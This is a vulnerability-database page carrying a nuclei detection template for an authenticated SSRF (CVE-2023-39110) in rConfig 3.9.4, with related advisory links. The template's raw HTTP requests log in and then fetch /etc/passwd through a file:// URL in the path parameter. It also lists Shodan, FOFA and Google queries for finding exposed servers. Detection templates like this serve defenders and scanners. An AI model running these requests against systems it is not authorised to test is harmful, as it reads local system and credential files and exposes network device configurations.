Lucene search
K

rConfig 3.9.4 - Server-Side Request Forgery

šŸ—“ļøĀ 05 Jul 2026Ā 03:01:21Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 19Ā Views

rConfig 3.9.4 contains Server-Side Request Forgery (SSRF) vulnerability allowing authenticated attackers to make arbitrary requests via crafted URLs

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-39110
1 Aug 202314:15
–attackerkb
Circl
CVE-2023-39110
1 Aug 202318:38
–circl
CNNVD
rConfig Code Issue Vulnerability
1 Aug 202300:00
–cnnvd
CVE
CVE-2023-39110
1 Aug 202300:00
–cve
Cvelist
CVE-2023-39110
1 Aug 202300:00
–cvelist
NVD
CVE-2023-39110
1 Aug 202314:15
–nvd
OSV
CVE-2023-39110
1 Aug 202314:15
–osv
Prion
Server side request forgery (ssrf)
1 Aug 202314:15
–prion
Vulnrichment
CVE-2023-39110
1 Aug 202300:00
–vulnrichment
id: CVE-2023-39110

info:
  name: rConfig 3.9.4 - Server-Side Request Forgery
  author: theamanrawat
  severity: high
  description: |
    rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path parameter at /ajaxGetFileByPath.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
  impact: |
    Authenticated attackers can exploit SSRF through the path parameter in ajaxGetFileByPath.php to read local files and access internal network resources, potentially exposing network device configurations and credentials stored in rConfig.
  remediation: |
    Update rConfig to a version newer than 3.9.4 that validates URLs in the path parameter of ajaxGetFileByPath.php and restricts access to authorized protocols and destinations.
  reference:
    - https://www.rconfig.com/downloads/rconfig-3.9.4.zip
    - https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_%20ajaxGetFileByPath.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39110
    - https://github.com/zer0yu/CVE_Request
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-39110
    cwe-id: CWE-918
    epss-score: 0.02746
    epss-percentile: 0.84402
    cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: rconfig
    product: rconfig
    shodan-query:
      - http.title:"rConfig"
      - http.title:"rconfig"
    fofa-query: title="rconfig"
    google-query: intitle:"rconfig"
  tags: cve2023,cve,rconfig,authenticated,ssrf,lfr,vuln

http:
  - raw:
      - |
        GET /login.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /lib/crud/userprocess.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&pass={{password}}&sublogin=1
      - |
        GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=file://localhost/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body_3
        regex:
          - "root:.*:0:0:"

      - type: word
        part: body_1
        words:
          - 'rConfig'

      - type: status
        part: header_3
        status:
          - 200
# digest: 4b0a00483046022100de694493f570d4d6d262a505ad4d819132704a07ab6963a0cad632512cfeca42022100ab3e29af70a56c9dcf6d4c4f67b511bdf33db36b8b28e213a48512264229ca9f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.18.8
EPSS0.02746
SSVC
19